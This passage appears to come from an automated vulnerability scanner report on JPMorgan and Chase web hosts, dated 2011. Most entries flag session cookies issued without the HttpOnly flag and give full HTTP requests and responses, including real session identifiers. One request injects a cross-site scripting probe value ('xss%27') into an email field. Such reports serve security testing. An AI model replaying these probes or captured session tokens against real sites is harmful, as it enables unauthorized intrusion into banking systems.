User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=213AD3313E3D72515757731898F72E4D; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

email=xss%27&customInfoIndex=3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:30:14 GMT
Server: Apache
Set-Cookie: JSESSIONID=E6E4CC6AA03FB89B0056EE20A6421FE8; Path=/sso; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 9235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http
...[SNIP]...

11.4. https://iblogin.jpmorgan.com/sso/action/web_NeedHelp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/web_NeedHelp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=42549B0052B37D588AC2939278D2C831; Path=/sso; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/action/web_NeedHelp?customInfoIndex=3 HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pajpm1-temp="Tue Jul 12 12:29:11 EDT 2011"; JSESSIONID=DE00D58DB588844C6E9864B7FFC50B8E; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=42549B0052B37D588AC2939278D2C831; Path=/sso; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 9160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="
...[SNIP]...

11.5. https://locator.chase.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.6. https://locator.chase.com/__utm.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/__utm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E4135AF775452F8F0E84265EF44E472C.ftc-web4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /__utm.gif?utmwv=1&utmn=1259117557&utmcs=UTF-8&utmsr=1920x1200&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.3%20r181&utmcn=1&utmdt=Find%20a%20CHASE%C2%AE%20Branch%20or%20ATM%20near%20you&utmhn=locator.chase.com&utmr=-&utmp=/ HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=E2DBBDFF293D6E983FAF3BEDF84D4182.ftc-web1; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 12 Jul 2011 16:08:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=E4135AF775452F8F0E84265EF44E472C.ftc-web4; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: https://locator.chase.com/LocatorAction.do;jsessionid=E4135AF775452F8F0E84265EF44E472C.ftc-web4
Content-Language: en-US
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1

11.7. https://locator.chase.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F7B21C037CECDFCC684BB41F8A8855C8.ftc-web4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8EEB941FE1274DFCE21BE8CFDBAF22F9.ftc-web1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=F7B21C037CECDFCC684BB41F8A8855C8.ftc-web4; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"894-1310075672000"
Last-Modified: Thu, 07 Jul 2011 21:54:32 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 894
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

..............h.......(....... .............................................f.Z .Z .Z .Z .Z .d...........................f.Z .Z .Z .Z .Z .Z .Z ....y7.................f.Z .Z .Z .Z .Z .Z .Z .Z ....Z ..V
...[SNIP]...

11.8. https://locator.chase.com/images/IconWeblinking.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/IconWeblinking.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=EEE6F8A0CF87F7887329193DE5F22EB9.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/IconWeblinking.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=EEE6F8A0CF87F7887329193DE5F22EB9.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"326-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 326
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a.....,.......................................A....._..............j.............................`..B..f.................{.....P..v........@.......................................................
...[SNIP]...

11.9. https://locator.chase.com/images/advbg.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/advbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=59A65050940B5BA51FECFF21456ACA58.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/advbg.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=59A65050940B5BA51FECFF21456ACA58.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"212-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 212
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a.......................................................................................................!.......,..........Q. ..@.hJ l..K,..`....|....0.(....r.TB..(.A.Z...v[Px.`/cL.....:.h..m.|N.
...[SNIP]...

11.10. https://locator.chase.com/images/advdash.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/advdash.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=D9F7E08CD0CC2F91CA0CCDA4249A01B8.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/advdash.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=7E1DDC48CCEBEA6B00595950E8641B73.ftc-web1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=D9F7E08CD0CC2F91CA0CCDA4249A01B8.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"43-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 43
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a.............!.......,............
.;

11.11. https://locator.chase.com/images/advhelp_btn.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/advhelp_btn.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B1CF839D058E95D6F382353BC3DAC804.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/advhelp_btn.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=B1CF839D058E95D6F382353BC3DAC804.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"543-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 543
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89aT............\\Z..................]][.........bb_.....................QQQ......\\\.........ffa...ssp...............nnn......ooo...PPP...........x.................................................
...[SNIP]...

11.12. https://locator.chase.com/images/advsearch_btn.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/advsearch_btn.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=73D74F9A0571449CBB63F4AD654EA414.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/advsearch_btn.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=73D74F9A0571449CBB63F4AD654EA414.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"681-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 681
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89ai............}.U.....r.........s.GRbF........................h.9............SbG..d..................sss.....x...m|`...]{D\\\...Ms.......XhLWWW........cXcO.....................PPP...OOO..........
...[SNIP]...

11.13. https://locator.chase.com/images/arrow_white_down.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/arrow_white_down.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_white_down.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=7E1DDC48CCEBEA6B00595950E8641B73.ftc-web1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"55-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a..
..........!.......,......
..........#x.E7.^..;

11.14. https://locator.chase.com/images/arrow_white_up.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/arrow_white_up.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B81A0649ED1A2424BB71FFDFAD06F547.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_white_up.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=B81A0649ED1A2424BB71FFDFAD06F547.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"62-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 62
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a
..................!.......,....
................(o.m..;

11.15. https://locator.chase.com/images/bgMainContent.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/bgMainContent.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8EEB941FE1274DFCE21BE8CFDBAF22F9.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bgMainContent.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=8EEB941FE1274DFCE21BE8CFDBAF22F9.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1008-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 1008
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a..................................................................................^.....a........d..P........k...........l........h....................t..f..|..\...........Z.....;...............
...[SNIP]...

11.16. https://locator.chase.com/images/blue_phone.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/blue_phone.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=97316C0ECB2E86D57AF62CA360210DBA.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/blue_phone.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=97316C0ECB2E86D57AF62CA360210DBA.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"966-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 966
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a..&.....................................#....?................................o../..;.....w.....k........?...........O..W........g.................G.._................./..3...........{..'......
...[SNIP]...

11.17. https://locator.chase.com/images/chase_atms.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/chase_atms.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=25913A16767852059017F45CFCE4240A.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/chase_atms.jpg HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=25913A16767852059017F45CFCE4240A.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"73699-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 73699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg;charset=ISO-8859-1

......JFIF.............C.................
..
.......................#"""#''''''''''...C. ..
. ...................................!! !!''''''''''..........."..............................
...[SNIP]...

11.18. https://locator.chase.com/images/chase_home.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/chase_home.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F7B9904D0D823FB82B09246886DA2B44.ftc-web4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/chase_home.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=F7B9904D0D823FB82B09246886DA2B44.ftc-web4; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1954-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 1954
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a'.".............5y.5e.|.....H...........i..X.........................................&g....{........I[yns.l........l|....g........:.....t..Z..L..8j.............$Z.V{..........@..Hj....q..u..Z...
...[SNIP]...

11.19. https://locator.chase.com/images/close.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/close.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A0892C71FA34D1655EDC7CDF3CACA563.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/close.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
